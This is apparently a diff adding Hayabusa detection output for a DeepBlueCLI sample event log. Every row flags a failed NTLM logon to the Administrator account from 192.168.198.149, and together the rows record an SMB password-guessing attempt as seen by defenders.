+2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 64ISDuFRhR6cFYVQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hcprXytyuBw380XY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxfQWiSIhZYxwNjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FcL982boDelzeyzK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBAAjRdaR8U0tqt7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EmqUjcltAW6StHQJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 129Rp3HCmRVRXw3C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jpIIQP2oWEF51EBI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HREGh5ppEkLAuEob | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UVkpQvotEMfM8R0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dm6uHEy5RJJBJ6FG | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HPTyAkYjcIlko5lu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OjlRoo9Sot4Fx4Th | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XslY26kw2aBw19D8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1404fakprYeqGiNY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y2VfIjtBcXCRlOjp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: LPztyX4J9NV8EldT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 07flrrzWgsVBYaN2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vgkqkC1VvznGxR6N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hMn6yDMLgLChJTL6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uSTokOJ31Tj0bLXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyRifC46GrNpTA4x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CvNaby30vAT9drAX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wkYSOQ2bD51a4U8l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rqdOquL9Ax01RPPU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nqCCiK5arcyRHha6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TpyTGZLkAb0w0kgW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wa2pXrZKxeZZYKAq | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dK0N5KeBgCze1YWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g4dHlwZjMzI5wU2s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GzF2ouP5KkRfsxnf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RSQxMrGlDiAOo6ri | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gL0rz3p1yG6RhfAT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: oyChoTSKgJeK6yqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tG4I11dwpBM9SM3l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7foAZ5Y1igCbHap | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ATDXUljQwg8WvUVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdmXaJqQMAG2g6Ao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bjame5puT5CDeoIG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0FGGVVkckmdURVh6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j0Smqw4cA4wG2Q6m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KLWloOhUYEQlj6y6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Tuxuykh0j5afeTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aeXS6QwYhqJAOeuz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AqFSJCq5bmBW6dj1 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DH1zyt1hxTgzajhW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rrZxcWjUX4OgYYIb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ExtkYXSJI8F41uvw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sLh1Q3RieOoukiCT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kNb2hZDxi4QrbQpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: jCb1TMlFj2PjH2sA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rgF42C57Nx6F3HU3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KZfFH9geIrxVYowJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWz1XeyxywR0o5gS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: og1kItEC6WhqXF37 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q0KhaJlD6tWwF2ky | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XUy0EKmjyD6ZYENA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h3MdGstPPFJDGzwG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VTs0ZQa6LGrKZKsY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FefzWjMXSvMdvqcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlnUt9tPRSXR5mWs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dehb4M6pcxi56Bkl | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tLXHvGiUqZyxax4W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bP1gKcf1eeKm0RB1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldbN1odP77n0BOzO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: drRC8qCbPe5e4mdR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lBg39AUtzZi6Q4iz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: huv5YEPo1n7UiFkq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9CLLwao1NDtBulxs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SB88EHHhDWhvJI87 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtBvklueV4MZo3pJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: noha7Vw85VfURHik | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wl5eIYvoKpJGUcSl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
